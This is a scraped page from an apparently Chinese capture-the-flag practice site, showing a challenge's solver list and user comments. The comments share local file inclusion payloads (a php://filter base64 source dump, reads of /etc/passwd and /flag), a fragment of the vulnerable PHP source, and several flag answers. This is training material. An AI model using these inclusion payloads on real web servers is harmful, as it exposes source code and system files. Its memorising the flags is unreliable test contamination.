评分(11)
解题动态

海浪geigei 攻破了该题 3小时前

merrymu 攻破了该题 17小时前

Hehe0619 攻破了该题 22小时前

sun03 攻破了该题 1天前

春遇枝庭 攻破了该题 1天前

Snly 攻破了该题 2天前

YGLZ 攻破了该题 2天前

ffggfhge 攻破了该题 2天前

小白ctf 攻破了该题 2天前

17335918325 攻破了该题 2天前

shimen 攻破了该题 3天前

北城以北 攻破了该题 3天前

人闲桂花落 攻破了该题 3天前

roopelee 攻破了该题 3天前

lwlzjsj 攻破了该题 3天前

Xman21 攻破了该题 3天前

TheSunnyTeens 攻破了该题 3天前

dwx1583 攻破了该题 3天前

hua1232 攻破了该题 4天前

评论
bkyhack123 1年前
举报
<?php error_reporting(0); if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';} $file=$_GET['file']; if(strstr($file,"../")||stristr
fonddream 1年前
举报
http://114.67.175.224:18948/index.php?file=php://filter/convert.base64-encode/resource=index.php 得到一串base64编码,解码之后发现是源码,直接有falg
大哥大 1年前
举报
http://114.67.175.224:11806/index.php?file=/flag Copy this url then you can get the flag.
nicchanggh 1年前
举报
flag{e92c0ec08be5fc7e0bd706e697e366fd}
chushou 1年前
举报
flag{ebfea7aca0bd16bb5819c678090ff026}
107zsm 1年前
举报
打开环境看到有一个超链接click me? no,点进去变成了index.php,并且URL末尾多了一句index.php?file=show.php,看到*.php?file就能猜到是伪协议读取文件了,把URL改成index.php?file=/etc/passwd,爆出来的数据也能验证,而且没过滤,直接index.php?file=/flag
小夫 1年前
举报
file=/flag
rightstar 1年前
举报
flag{a1ad1a8522261e6b9abf21e9bd6ef675}
sibeil 2年前
举报
flag{b23328bbf165641292d9871be279459a}
wxy1343 2年前
举报
flag{a15320afe0f7ad00fb16135d7456a9e1}